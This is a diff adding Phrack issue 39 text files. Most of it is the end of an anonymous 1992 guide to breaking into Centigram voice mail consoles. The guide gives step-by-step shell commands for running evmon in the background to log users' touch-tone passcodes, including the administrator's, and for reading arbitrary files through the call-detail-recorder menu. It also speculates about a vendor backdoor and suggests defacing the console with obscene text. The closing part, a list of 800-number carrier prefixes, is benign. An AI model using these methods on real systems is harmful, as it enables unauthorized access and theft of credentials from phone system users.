+on the actual voice mailboxes, and the phone line just sat there, dead as old
+wood.  I was quite relieved that it came back up after a few minutes.
+
+     The other directory, 4:/cmds, is filled with more specific commands
+pertaining to functions within the voice mail system itself.  These programs
+are actually run from within other programs to produce an easy-to-understand
+menu system.  Normally, this menu system is immediately run after the entry of
+the remote or console passcode, but it would not be run when using the
+aforementioned security bug.  It can be run from the shell simply by typing the
+name of the program, console.
+
+Mounting and Initializing Drives:
+
+     The MOUNT command produces results similar to this when run without
+arguments:
+
+$ mount
+Drive 1:    Hard,  360k, offset =  256k, partition= Qnx
+Drive 2:  Floppy,  360k, p=1
+Drive 3: RamDisk,   96k, partition= Qnx
+Drive 4:    Hard,  6.1M, offset =  616k, partition= Qnx
+$tty0  = $con   ,     Serial at 03F8
+$tty1  = $term1 ,     Serial at 02F8
+$tty2  = $term2 ,     Serial at 0420
+$tty3  = $mdm   ,     Serial at 0428
+
+     The hard and floppy drives are fairly self-explanatory, although I can't
+explain why they appear to be so small, nor do I know where the voice
+recordings go, or if this list contain all the space required for voice
+storage.
+
+     The ramdisk, however, is a bit more interesting to me.  The mount command
+used for the above-mentioned disk 3 was:
+
+$ mount ramdisk 3 s=96k -v
+
+     Although I'm not sure what the -v qualifier does, the rest is fairly
+straight forward.  I assume that the size of the drive can be greater than 96k,
+although I haven't yet played with it to see how far it can go.  To initialize
+the drive, the following command was used:
+
+$ dinit 3
+
+     Quite simple, really.   Now, the drive is ready for use so one can "mkdir
+3:/tmp" or some such and route files there as desired, or use it for whatever
+purpose.  If something is accidentally redirected to the console with >$cons,
+you can use the line editor "led" to create a temporary file and then use the
+print utility "p" to clear the console's screen by using "p filename >$cons"
+where filename contains a clear screen of 25 lines, or an ANSI bomb (if
+appropriate), or a full-screen DobbsHead or whatever you like.
+
+EVMON and password collecting:
+
+     The evmon utility is responsible for informing the system manager about
+the activity currently taking place within the voice mail system.  Run alone,
+evmon produces output similar to:
+
+$ evmon
+Type Ctrl-C to terminate.
+ln  26 tt 3
+ln  26 line break
+ln  26 onhook
+ln  28 ringing
+ln  28 tt 8
+ln  28 tt 7
+ln  28 tt 6
+ln  28 tt 2
+ln  28 offhook
+ln  28 tt *
+ln  28 tt 2
+ln  28 tt 0
+ln  28 tt 3
+ln  28 tt 0
+ln  28 line break
+ln  28 onhook
+[...]
+
+And so forth.  This identifies a certain phone line, such as line 28, and a
+certain action taking place on the line, such as the line ringing, going on or
+offhook, etc.  The "tt" stands for touch tone, and it is, of course, the tone
+currently played on the line; which means that touchtone entry of passcodes can
+be recorded and filed at will.  In the above example, the passcode for Mailbox
+8762 is 2030 (the * key, along with the 0 key, can acts as the "user entering
+mailbox" key; it can, however, also be the abort key during passcode entry, and
+other things as well).  Now the user, of course, doesn't usually dial 8762 to
+enter his mailbox; he simply dials the mailbox number and then * plus his
+passcode; the reason for this is the type of signalling coming from the switch
+to this particular business line was set-up for four digit touch tone ID to
+route the line to the appropriate called number.  This is not the only method
+of signalling, however, as I've seen other businesses that use three digit
+pulse signalling, for example, and there are others as well.  Each may have
+it's own eccentricities, but I would imagine that the line ID would be
+displayed with EVMON in most cases.
+
+     Now, let's say we're on-line, and we want to play around, and we want to
+collect passcodes.  We've set up our ramdisk to normal size and we are ready to
+run evmon.  We could run it, sit at our terminal, and then record the output,
+but it's such a time consuming task (this is "real-time," after all) that
+sitting and waiting be nearly pointless.  So, we use the handy features of
+run-in-background and file-redirection (see, I told you we were getting
+"Unix-like").
+
+$ evmon > 3:/tmp/output &
+Type Ctrl-C to terminate.
+5e1e
+$ ...
+
+     5e1e is the task ID (TID) of the new evmon process.  Now we can go off and
+perform whatever lists we want, or just play in the directories, or route
+DobbsHeads or whatever.  When we decide to end for the day, we simply stop
+EVMON, nab the file, remove it, and if necessary, dismount the ramdisk.
+
+$ kill 5e1e
+$ p 3:/tmp/output
+[ EVMON output would normally appear; if, however, ]
+[ there is none, the file would be deleted during  ]
+[ the kill with an error message resulting         ]
+$ rm 3:/tmp/output
+$ rmdir 3:/tmp
+$ mount ramdisk 3
+
+     and now we can ^D or exit out of the shell and say good-bye.
+
+     The good thing about this EVMON procedure is that you don't need to be
+on-line while it runs.  You could start a task sometime at night and then wait
+until the next day before you kill the process and check your results.  This
+usually produces large log files anywhere from 40K to 200K, depending upon the
+amount of system usage (these figures are rough estimates).  If, however, you
+start the EVMON task and leave it running, then the administrator will not be
+able to start a new EVMON session until the old task is killed.  While this
+probably shouldn't be a problem over the weekends, during business hours it may
+become a little risky.
+
+     Remember though, that the risk might be worth it, especially if the
+administrator decides to check his mailbox; you'd then have his passcode, and,
+possibly, remote telephone access to system administrator functions via touch-
+tone on the mailbox system.
+
+Task management:
+
+     As we have just noted, any task like EVMON can be run in the background by
+appending the command line with a &, the standard Unix "run-in-background"
+character.  A Task ID will echo back in hexadecimal, quite comparable to the
+Unix Process ID.  The program responsible for task management is called "tsk"
+and should be in 1:/cmds/tsk.  Output from running tsk alone should look
+something like:
+
+$ tsk
+Tty Program         Tid  State Blk  Pri   Flags     Grp Mem Dad  Bro  Son
+  0 task            0001 READY ----  1 ---IPLA----- 255 255 ---- ---- ----
+  0 fsys            0002 RECV  0000  3 ---IPLA----- 255 255 ---- ---- ----
+  0 dev             0003 RECV  0000  2 ---IPLA----- 255 255 ---- ---- ----
+  0 idle            0004 READY ---- 15 ----PLA----- 255 255 ---- ---- 0508
+  0 /cmds/timer     0607 RECV  0000  2 -S--P-AC---- 255 255 ---- ---- ----
+  0 /cmds/err_log   0509 RECV  0000  5 -S--P--C---- 255 255 0A0A ---- ----
+  0 /cmds/ovrseer   0A0A REPLY 0607  5 -S--P--C---- 255 255 ---- ---- 030C
+  0 /cmds/recorder  010B REPLY 0509  5 -S--P--C---- 255 255 0A0A 0509 ----
+  0 /cmds/master    030C REPLY 0607  5 -S--P--C---- 255 255 0A0A 010B 011C
+              [ ... a wide assortment of programs ... ]
+  0 /cmds/vmemo     011C REPLY 0110 13 -S-----C---- 255 255 030C 011B ----
+  3 /cmds/comm      0508 RECV  5622  8 ----P-A----- 255 255 0004 ---- 5622
+  3 /cmds/tsk       051D REPLY 0001  8 ------------ 255 255 301E ---- ----
+  3 /cmds/qnxsh     301E REPLY 0001 14 ---------E-- 255 255 5622 ---- 051D
+  3 /cmds/login     5622 REPLY 0003  8 -------C---- 255 255 0508 ---- 301E
+
+     Although I'm not quite sure at some of the specifics displayed in this
+output, the important parts are obvious.  The first column is the TTY number
+which corresponds to the $tty list in "mount" (meaning that the modem I've just
+called is $tty3, and I am simultaneously running four tasks from that line);
+the second column is the program name (without the drive specification); the
+third column is the task ID; the middle columns are unknown to me; and the last
+three represent the ties and relations to other tasks (parent task ID, another
+task ID created from the same parent, and task ID of any program called).
+
+     Knowing this, it's easy to follow the tasks we've created since login.
+Initially, task 0508, /cmds/comm, was run, which presumably contains the
+requisite "what should I do now that my user has pressed a key?" functions,
+which called /cmds/login to log the user in.  Login was interrupted with ^Z and
+one of the shells, qnxsh, was called to handle input from the user.  Finally,
+the typing of "tsk" requires that the /cmds/tsk program be given a task ID, and
+the output of the program is simply confirming that it exists.
+
+     As mentioned, to kill a task from the shell, simply type "kill [task-id]"
+where [task-id] is the four digit hexadecimal number.
+
+     There are other functions of the tsk program as well.  The help screen
+lists:
+
+$ tsk ?
+use: tsk [f={cmoprst}] [p=program] [t=tty] [u=userid]
+     tsk code [p=program]
+     tsk info
+     tsk mem t=tid
+     tsk names
+     tsk size [p=program] [t=tty] [u=userid]
+     tsk ports
+     tsk tsk
+     tsk tree [+tid] [+all] [-net]
+     tsk users [p=program] [t=tty] [u=userid]
+     tsk vcs
+     tsk who tid ...
+options: +qnx -header +physical [n=]node s=sort_field
+
+     I haven't seen all the information available from this, yet, as the plain
+"tsk" tells me everything I need to know; however, you may want to play around:
+there's no telling what secrets are hidden...
+
+$ tsk tsk
+Tsk tsk? Have I been a bad computer?
+
+     See what I mean?
+
+ddump:
+
+     The ddump utility is used to display the contents on a specified blocks of
+the disk.  It's quite simple to use.
+
+$ ddump ?
+use: ddump drive block_number [-v]
+
+     Again, I'm not quite sure what the -v switch does, but the instructions
+are very straightforward.  Normal output looks similar to:
+
+$ ddump 3 3
+Place diskette in drive 3 and hit <CR>     <-- this message is always
+                                               displayed by ddump.
+Block 00000003  Status: 00
+000:  00 00 00 00 00 00 00 00 94 00 00 00 00 00 00 00 ................
+010:  01 00 01 00 40 02 00 00 00 02 00 00 00 00 00 00 ....@...........
+020:  00 01 00 FF FF 00 00 97 37 29 17 00 01 01 01 30 ........7).....0
+030:  C4 17 8E 62 69 74 6D 61 70 00 00 00 00 00 00 00 ...bitmap.......
+040:  00 00 00 00 C0 00 00 00 00 00 00 00 00 00 00 00 ................
+050:  00 00 00 FF FF 00 00 A5 37 29 17 00 01 01 17 30 ........7).....0
+060:  C4 25 8E 6C 6C 6C 00 00 00 00 00 00 00 00 00 00 .%.lll..........
+070:  00 00 00 00 50 0E 00 00 00 0E 00 00 00 00 00 00 ....P...........
+080:  00 01 00 FF FF 7E 05 A8 38 29 17 00 01 01 17 30 .....~..8).....0
+090:  C4 28 8F 61 62 63 00 00 00 00 00 00 00 00 00 00 .(.abc..........
+0A0:  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
+0B0:  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
+[...etc...]
+
+     As you can probably notice, what we have here is the directory track for
+the ramdisk.  It lists three files, even though the file abc no longer exists.
+The actual bytes have yet to be decoded, but, as far as the ramdisk goes, I
+suspect that they'll be memory related, and not physical block related; that
+is, I suspect that some of the numbers given above correspond to the memory
+address of the file, and not to the actual disk-block.  So, at least for the
+ramdisk, finding specific files may be difficult.  However, if you only have
+one file on the ramdisk besides "bitmap" (which appears to be mandatory across
+all the disks), then the next file you create should reside on track 4 and
+continue working its way up.  Therefore, if you have evmon running and
+redirected to a file on the ramdisk, in order to check the contents, it's not
+necessary to kill the process and restart evmon, etc.  Simply "ddump 3 4" and
+you could get either useless information (all the bytes are 00 or FF), or you
+could get something like:
+
+$ ddump 3 4
+Place diskette in drive 3 and hit <CR>
+
+Block 00000004  Status: 00
+000:  00 00 00 00 00 00 00 00 00 00 00 00 09 00 00 00 ................
+010:  6C 6E 20 20 32 36 20 74 74 20 33 1E 6C 6E 20 20 ln  26 tt 3.ln
+020:  32 36 20 6C 69 6E 65 20 62 72 65 61 6B 1E 6C 6E 26 line break.ln
+030:  20 20 32 36 20 6F 6E 68 6F 6F 6B 1E 6C 6E 20 20   26 onhook.ln
+040:  32 38 20 72 69 6E 67 69 6E 67 1E 6C 6E 20 20 32 28 ringing.ln  2
+050:  38 20 74 74 20 38 1E 6C 6E 20 20 32 38 20 74 74 8 tt 8.ln  28 tt
+060:  20 37 1E 6C 6E 20 20 32 38 20 74 74 20 36 1E 6C  7.ln  28 tt 6.l
+070:  6E 20 20 32 38 20 74 74 20 32 1E 6C 6E 20 20 32 n  28 tt 2.ln  2
+080:  38 20 6F 66 66 68 6F 6F 6B 1E 6C 6E 20 20 32 38 8 offhook.ln  28
+090:  20 74 74 20 2A 1E 6C 6E 20 20 32 38 20 74 74 20  tt *.ln  28 tt
+
+     And so forth, thus making sure that the file does have some content.
+Depending upon the length of that content, you could then choose to either keep
+the file running, or restart evmon and buffer the previous output.
+
+led:
+
+     The program "led" is Centigram's answer to a standard text editor.  It is
+equivalent to "ed" in Unix or "edlin" in MS-DOS, but it does have its minor
+differences.  "led" is used to create text files, edit existing log files, or
+edit executable shell scripts.  By typing "led [filename]", you will enter the
+led editor, and if a filename is specified, and it exists, the file will be
+loaded and the editor set to line 1.  If there is no filename on the command
+line, the file does not exist, or the file is busy, then led begins editing a
+null file, an empty buffer, without the corresponding filename.
+
+     Commands can also be specified to be used in led after the filename is
+entered.  If needed, you can experiment with this.
+
+ Notable commands from within led:
+
+   i             insert
+   a             append
+   w [filename]  write to disk; if no file is named, attempt to
+                 write to current file; if there is no current
+                 file, do not write.
+   d             delete current line
+   a number      goto line numbered
+   q             quit (if not saved, inform user to use "qq")
+   qq            really quit
+
+     When inserting or appending, led will prompt you with a "." period.  To
+end your entry, simply enter one period alone on a line and you will then
+return to command mode.  When displaying the current entry, led will prefix all
+new, updated lines, with the "i" character.
+
+     The key sequence to enter a DobbsHead into a file and redirect it to the
+console, then, would be:
+
+$ led 3:/dobbshead
+3:/dobbshead : unable to match file
+i
+.               ___
+.           .  /   \
+.           . | o o |
+.           . |  Y  |
+.           U=====  |
+.              \___/
+.           FUCK YOU!
+q
+?4 buffer has been modified, use qq to quit without saving
+w 3:/dobbshead
+7 [the number of lines in the file]
+q
+$ p 3:/dobbshead > $cons
+$ rm 3:/dobbshead
+
+     Ok, so it's not quite the DobbsHead.  Fuck you.
+
+The console utility:
+
+     The program that acts as the menu driver for the Voice Mail System
+Administration, the program that is normally run upon correct passcode entry,
+is /cmds/console.  This program will simply produce a menu with a variety of
+sub-menus that allow the administrator to perform a wide assortment of tasks.
+Since this is mostly self-explanatory, I'll let you find out about these
+functions for yourself; I will, however, add just a few comments about the
+console utility.  The first menu received should look like this:
+
+(c) All Software Copyright 1983, 1989 Centigram Corporation
+All Rights Reserved.
+
+         MAIN MENU
+
+(M) Mailbox maintenance
+(R) Report generation
+(S) System maintenance
+(X) Exit
+
+Enter letter in () to execute command.
+When you need help later, type ?.
+
+COMMAND (M/R/S/X):
+
+     The mailbox maintenance option is used when you want to find specific
+information concerning mailboxes on the system.  For instance, to get a listing
+of all the mailboxes currently being used on the system:
+
+COMMAND (M/R/S/X): m
+
+    MAILBOX MAINTENANCE
+
+(B) Mailbox block inquiry
+(C) Create new mailboxes
+(D) Delete mailboxes
+(E) Mailbox dump
+(I) Inquire about mailboxes
+(L) List maintenance
+(M) Modify mailboxes
+(P) Set passcode/tutorial
+(R) Rotational mailboxes
+(S) Search for mailboxes
+(X) Exit
+
+If you need help later, type ?.
+
+COMMAND (B/C/D/E/I/L/M/P/R/S/X): i
+Report destination (c/s1/s2) [c]:
+
+Mailbox to display: 0000-9999
+
+                                 >>> BOBTEL <<<
+                              Mailbox Data Inquiry
+                            Tue Mar 31, 1992  3:07 am
+
+Box        Msgs Unp Urg Rec   Mins FCOS LCOS GCOS NCOS MWI           Passwd
+8001         1   1   0   0     0.0 5    5    1    1   None           Y
+8002         0   0   0   0     0.0 5    5    1    1   None           Y (t)
+8003         0   0   0   0     0.0 12   12   1    1   None           Y
+8005         0   0   0   0     0.0 12   12   1    1   None           Y
+8006         6   6   0   0     0.7 12   12   1    1   None           N
+8008         0   0   0   0     0.0 5    5    1    1   None           Y
+8013         0   0   0   0     0.0 12   12   1    1   None           1234
+8014         0   0   0   0     0.0 5    5    1    1   None           Y
+8016         0   0   0   0     0.0 12   12   1    1   None           Y
+[ ... etc ... ]
+
+     This simply lists every box along with the relevant information concerning
+that box.  Msgs, Unp, Urg, Rec are the Total number of messages, number of
+unplayed messages, number of urgent messages, and number of received messages
+currently being stored on the drive for the mailbox; Mins is the numbers of
+minutes currently being used by those messages; F, L, G, and NCOS are various
+classes of service for the mailboxes; MWI is the message waiting indicator, or
+service light; and Passwd is simply a Yes/No condition informing the
+administrator whether the mailbox currently has a password.  The "(t)" in the
+password field means the box is currently in tutorial mode, and the "1234" that
+replaces the Y/N condition, which means the box is set to initial tutorial mode
+with simple passcode 1234 -- in other words the box is available to be used by
+a new subscriber.  Mailboxes with FCOS of 1 should be looked for: these
+represent administration or service mailboxes, although they are not
+necessarily capable of performing system administration functions.
+
+     The System Maintenance option from the main menu is very useful in that,
+if you don't have access to the qnxsh, you can still run a number of tasks or
+print out any file you wish from within the menu system.  The System
+Maintenance menu looks like:
+
+         SYSTEM MAINTENANCE
+
+(A) Automatic Wakeup
+(B) Automated Receptionist Extensions
+(D) Display modem passcode
+(E) Enable modem/serial port
+(F) Floppy backup
+(G) Resynchronize HIS PMS room status
+(H) Hard Disk Utilities
+(L) Lights test
+(M) Manual message purge
+(N) System name
+(P) Passcode
+(R) Reconfiguration
+(S) System shutdown
+(T) Time and date
+(U) Utility menu
+(V) Call Detail Recorder
+(W) Network menu
+(X) Exit
+
+Enter letter in () to execute command.
+When you need help later, type ?.
+
+COMMAND (A/B/D/E/F/G/H/L/M/N/P/R/S/T/U/V/W/X):
+
+     If you don't have access to the "p" command, you can still display any
+specific file on the drive that you wish to see.  Choose "v," the Call Detail
+Recorder option from above, and you will get this menu:
+
+COMMAND (A/B/D/E/F/G/H/L/M/N/P/R/S/T/U/V/W/X): v
+Warning: cdr is not running.
+
+CALL DETAIL RECORDER MENU
+
+(C) Configure CDR
+(R) Run CDR
+(T) Terminate CDR
+(E) Run EVMON
+(F) Terminate EVMON
+(S) Show CDR log file
+(D) Delete CDR log file
+(X) Exit
+
+If you need help later, type ?.
+
+COMMAND (C/R/T/E/F/S/D/X):
+
+     From here, you can use (C) Configure CDR to set the log file to any name
+that you want, and use (S) to print that file to your terminal.
+
+COMMAND (C/R/T/E/F/S/D/X): c
+
+Answer the following question to configure call detail recorder
+[ simply hit return until the last "filename" question come up ]
+VoiceMemo line numbers enabled:
+HOST 1 lines:
+ 0  1  2  3  4  5  6  7  8  9 10 11 12 13 14 15
+16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31
+VoiceMemo line numbers:
+
+EVMON: HOST 1 lines to monitor:
+ 0  1  2  3  4  5  6  7  8  9 10 11 12 13 14 15
+16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31
+EVMON:VoiceMemo line numbers:
+Message levels are:
+     1:  Detailed VoiceMemo
+     2:  VoiceMemo
+     3:  Pager
+     4:  Receptionist
+     5:  EVMON
+     6:  Automatic WakeUp
+     7:  Open Account Administrator
+     8:  DTMF to PBX
+     9:  Message Waiting Lamp
+    10:  SL-1 integration
+    11:  Centrex Integration
+Message levels enabled:
+ 2  3  7  9
+Message levels:
+cdr enable = [N]
+Enter filename to save log data = [/logfile] /config/remote.cmds
+
+Returning from the CDR configuration.
+
+CALL DETAIL RECORDER MENU
+
+(C) Configure CDR
+(R) Run CDR
+(T) Terminate CDR
+(E) Run EVMON
+(F) Terminate EVMON
+(S) Show CDR log file
+(D) Delete CDR log file
+(X) Exit
+
+If you need help later, type ?.
+
+COMMAND (C/R/T/E/F/S/D/X): s
+ad
+cd
+copy
+date
+dskchk
+evmon
+files
+ls
+mount
+p
+pwd
+query
+task
+tcap
+what
+
+     Don't forget to return the filename back to its original name as shown in
+the [] field after you have finished.
+
+     If you don't have access to the shell, you can also run EVMON, from the
+CDR menu, using option E.  It will simply start the evmon process displaying to
+your terminal, interruptable by the break character, ^C.  This, unfortunately,
+cannot be redirected or run in the background as tasks running from the shell
+can.  If, however, you have some time to kill, you may want to play with it.
+
+     Also, from the System Maintenance menu, you can perform a number of shell
+tasks without direct access to the shell.  Option (U), Utilities Menu, has an
+option called Task.  This will allow you limited shell access, possibly with
+redirection and "&" back-grounding.
+
+COMMAND (A/B/D/E/F/G/H/L/M/N/P/R/S/T/U/V/W/X): U
+
+         UTILITY MENU
+
+(B) Reboot
+(H) History
+(T) Task
+(X) Exit
+
+Enter letter in () to execute command.
+When you need help later, type ?.
+
+COMMAND (B/H/T/X): t
+
+Choose the following commands:
+             ad             cd           copy           date
+         dskchk          evmon          files             ls
+          mount              p            pwd          query
+           task           tcap           what
+
+Enter a command name or "X" to exit: pwd
+1:/
+
+Choose the following commands:
+             ad             cd           copy           date
+         dskchk          evmon          files             ls
+          mount              p            pwd          query
+           task           tcap           what
+
+Enter a command name or "X" to exit: evmon
+Type Ctrl-C to terminate.
+ln  29 ringing
+ln  29 tt 8
+ln  29 tt 0
+ln  29 tt 8
+ln  29 tt 6
+ln  29 offhook
+ln  29 record ended
+[ ... etc ... ]
+
+A look at "ad":
+
+     The program "ad" is called to dump information on a variety of things, the
+most useful being mailboxes.  Dumps of specific information about a mailbox can
+be done either in Mailbox format, or Raw Dump format.  Mailbox format looks
+like:
+
+$ ad
+Type #: 0
+Mailbox #: 8486
+(M)ailbox, (D)ump ? m
+
+MAILBOX: 8486
+
+Login status:
+    Bad logs     = 3          Last log     = 03/26/92 12:19 pmVersion = 0
+
+Configuration:
+    Name #       = 207314     Greeting     = 207309     Greeting2    = 0
+    Passcode     = XXXXXXXXXX Tutorial     = N          Extension    = 8486
+    Ext index    = 0          Attendant    =            Attend index = 0
+    Code         =            ID           = BOBTECH
+    Day_treat    = M          Night_treat  = M          Fcos         = 12
+    Lcos         = 12         Gcos         = 1          Ncos         = 1
+    Rot index    = 0          Rot period   = 0
+    Rot start    = --
+    wkup defined = N          wkup freq    = 0          wkup_intvl   = 0
+    wkup index   = 0          wkup number  =
+
+Contents:
+    Motd_seq     = 8          Motd_played  = N          User_msgs    = 0
+    Caller_msgs  = 4          Sent_cpx_msgs= 0          Sent_fdx_msgs= 0
+    Sent_urg_msgs= 0          Tas_msgs     = 0          Pages        = 0
+    Receipt      = 0          Sent_to_node = 0          Urg_to_node  = 0
+    Net_urg_mlen = 0          Net_msgs_rcv = 0          Net_urg_rcv  = 0
+    Net_sent_node= 0          Net_send_nurg= 0          Net_send_rcp = 0
+    Greet_count  = 9          Successlogins= 1          Recpt_calls  = 0
+    Recpt_complt = 0          Recpt_busy   = 0          Recpt_rna    = 0
+    Recpt_msgs   = 0          Recpt_attend = 0          User_connect = 20
+    Clr_connect  = 22         Callp_connect= 0          Disk_use     = 498
+    Net_sent_mlen= 0          Net_rcvd_mlen= 0          Net_rcvd_urg = 0
+    Net_node_mlen= 0          Net_recip_mlen=0          Net_node_urg = 0
+    Text_msg_cnt = 0
+
+
+Message Queues:
+    TYPE           COUNT TOTAL HEAD TAIL  TYPE           COUNT TOTAL HEAD TAIL
+    Free             71   ---   58   55   Unplayed          0   ---   -1   -1
+    Played            2   0.5   56   57   Urgent            0   ---   -1   -1
+    Receipts          0   ---   -1   -1   Undelivered       0   ---   -1   -1
+    Future delivery   0   ---   -1   -1   Call placement    0   ---   -1   -1
+
+Messages: 2
+ #  msg #   DATE    TIME   LENGTH      SENDER     PORT   FLAGS  MSG     SIBL
+                           (MINS)                               NXT PRV NXT PRV
+Played Queue
+56 207126 03/26/92 12:17 pm    0.5 000000000000000  27 ------P-  57  -1  -1  -1
+
+57 207147 03/26/92 12:19 pm    0.1 000000000000000  29 ------P-  -1  56  -1  -1
+
+     The Raw Dump format looks like:
+$ ad
+Type #: 0
+Mailbox #: 8487
+(M)ailbox, (D)ump ? d
+
+HEX: 8487
+000: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 |................|
+010: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 |................|
+020: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 34 38 |..............48|
+030: 37 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 |7...............|
+040: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 |................|
+050: 00 00 00 00 00 00 00 00 - 00 00 42 49 4f 54 45 43 |..........BOBTEC|
+060: 48 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 |H...............|
+070: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 |................|
+080: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 37 32 33 |.............723|
+090: 36 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 |6...............|
+0a0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 |................|
+0b0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 |................|
+0c0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 |................|
+[mostly deleted -- the list continues to hex fff.]
+
+     One of the unfortunate aspects is that the password is not displayed in
+the Mailbox format (Awwww!).   I can tell you now, though, that it also isn't
+displayed anywhere in the Raw Dump format.  The program "asetpass" was used to
+change the password of a test mailbox, and both full dumps were downloaded and
+compared; they matched exactly.  So, it looks like the passcodes are probably
+stored somewhere else, and the dump simply contains a link to the appropriate
+offset; which means the only way, so far, to get passcodes for mailboxes is to
+capture them in EVMON.
+
+Intricacies of the login program:
+
+     The console login program is 1:/cmds/login.  Although I can't even
+recognize any valid 8080 series assembly in the program (and I'm told the
+Centigram boxes run on the 8080 family), I did manage to find a few interesting
+tidbits inside of it.  First, the console and remote passwords seems to be
+stored in the file /config/rates; unfortunately, it's encrypted and I'm not
+going to try to break the scheme.  /config/rates looks like this:
+
+$ p /config/rates
+\CE\FFC~C~\0A\00\00\00\00\00\0A\00\00\00\00\00\0A\00\00\00\00\00\0A\00\00\00\00
+\00\0A\00\00\00\00\00\0A\00\00\00\00\00\0A\00\00\00\00\00\00\00\00\00\00\00\00
+\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00
+
+     Accepting the \CE as some sort of control byte, this file is divided up
+into about eight empty sections of five bytes a piece, mostly null, indicating
+that, possibly, there are a number of acceptable passcode combinations, or a
+number of different functions with different passcodes.  In this instance, only
+one passcode appears to be selected.  I am still unsure, however, whether this
+is actually a password file, or a file that would act as a pointer to another
+space on the disk which contains the actual password.  I would assume, for this
+login program, that it is actually an encrypted password.
+
+     Another very interesting thing sleeping within the confines of the login
+program is the inconspicuous string "QNX."  It sits in the code between two
+"Enter Passcode:" prompts, separated by \00s.  I believe this to be a system
+wide backdoor placed into the login program by Centigram, Corp.  Such a thing
+does exist; whenever Centigram wants to get into a certain mailbox system to
+perform maintenance or solve a problem, they can.  They may, however, require
+the serial number of the machine or of the hard drive, in order to get this
+access.  This serial number would be provided by the company requiring service.
+
+     When logging in with QNX, a very strange thing happens.
+
+(^Z)
+Enter Passcode: (QNX^M)  Enter Passcode:
+
+     A second passcode prompt appears, a prompt in which the "QNX" passcode
+produces an Invalid Passcode message.  I believe that when Centigram logs in
+from remote, they use this procedure, along with either a predetermined
+passcode, or a passcode determined based on a serial number, to access the
+system.  I have not ever seen this procedure actually done, but it is the best
+speculation that I can give.
+
+     I should also make note of a somewhat less important point.  Should the
+console have no passcodes assigned, a simple ^Z for terminal activation will
+start the /cmds/console program, and log the user directly in without prompting
+for a passcode.  The odds on finding a Centigram like this, nowadays, is
+probably as remote as being struck by lightning, but personally, I can recall a
+time a number of years back when a Florida company hadn't yet passcode
+protected a Centigram.  It was very fun to have such a large number of people
+communicating back and forth in normal voice; it was even more fun to hop on
+conferences with a number of people and record the stupidity of the average
+Bell operator.
+
+Special Keys or Strings:
+
+     There are a number of special characters or strings that are important to
+either the shell or the program being executed.  Some of these are:
+
+?     after the program name, gives help list for that program.
+&     runs a task in the background
+:     sets the comment field (for text within shell scripts)
+;     command delimiter within the shell
+>     redirects output of a task to a file
+<     (theoretically) routes input from a file
+$cons the "filename" of the console (redirectable)
+$tty# the "filename" of tty number "#"
+$mdm  the "filename" of the modem line
+#$    ? produces a value like "1920", "321d"
+        probably the TID of the current process
+##    ? produces a value like "ffff"
+#%    ? produces a value like "0020", "001d"
+#&    ? produces a value like "0000"
+#?    ? produces a value like "0000"
+#*    a null argument
+#g    ? produces a value like "00ff"
+#i    directly followed by a number, produces "0000"
+      not followed, produces the error "non-existent integer variable" probably
+      used in conjunction with environment variables
+#k    accepts a line from current input (stdin) to be
+      substituted on the command line
+#m    ? "00ff"
+#n    ? "0000"
+#p    ? "0042"
+#s    produces the error "non-existent string variable" probably used in
+      conjunction with environment variables
+#t    ? "0003"
+#u    ? some string similar to "system"
+#D    ? "0018"
+#M    ? "0004"
+#Y    ? "005c"
+
+"Centigram Voice Mail System Consoles" was written anonymously.  There are no
+group affiliations tied to this file.
+_______________________________________________________________________________
diff --git a/phrack39/7.txt b/phrack39/7.txt
new file mode 100644
index 0000000..8342d81
--- /dev/null
+++ b/phrack39/7.txt
@@ -0,0 +1,587 @@
+                                ==Phrack Inc.==
+
+                  Volume Four, Issue Thirty-Nine, File 7 of 13
+
+                /^\ /^\ /^\ /^\ /^\ /^\ /^\ /^\ /^\ /^\ /^\ /^\
+                /^\                                         /^\
+                /^\          Special Area Codes II          /^\
+                /^\                                         /^\
+                /^\              by Bill Huttig             /^\
+                /^\             wah@ZACH.FIT.EDU            /^\
+                /^\                                         /^\
+                /^\            February 24, 1992            /^\
+                /^\                                         /^\
+                /^\ /^\ /^\ /^\ /^\ /^\ /^\ /^\ /^\ /^\ /^\ /^\
+
+
+The first "Special Area Codes" file appeared in Phrack Issue 24, but here
+is an updated listing of the prefixes used with 800 toll free service.  This
+list shows which carrier handles calls placed to 800-XXX numbers.  Choice of
+carrier routing on calls to 800-xxx numbers cannot be overridden with 10xxx
+routing.  It should also be noted that on calls to 800 numbers, the called
+party either immediatly in some instances or on a delayed basis receives a
+record of numbers which called.  This identification of the calling party
+cannot be overridden with *67 or the "line-blocking" associated with Caller-ID.
+
+
+202 RCCP RADIO COMMON CARRIER PAGING
+212 RCCP RADIO COMMON CARRIER PAGING
+213 9348 CINCINNATI BELL TELEPHONE
+220 ATZ  ATX-COMMUNICATIONS
+221 ATX  AT&T-C
+222 ATX  AT&T-C
+223 ATX  AT&T-C
+224 LDL  LONG DISTANCE FOR LESS
+225 ATX  AT&T-C
+226 ATL  ATC
+227 ATX  AT&T-C
+228 ATX  AT&T-C
+229 TDX  CABLE & WIRELESS COMMUNICATIONS
+230 NTK  NETWORK TELEMANAGEMENT SERVICES
+231 ATX  AT&T-C
+232 ATX  AT&T-C
+233 ATX  AT&T-C
+234 MCI  MCI TELECOMMUNICATIONS CORPORATION
+235 ATX  AT&T-C
+236 SCH  SCHNEIDER COMMUNICATIONS
+237 ATX  AT&T-C
+238 ATX  AT&T-C
+239 DLT  DELTA COMMUNICATIONS, INC.
+240 SIR  SOUTHERN INTEREXCHANGE SERVICES
+241 ATX  AT&T-C
+242 ATX  AT&T-C
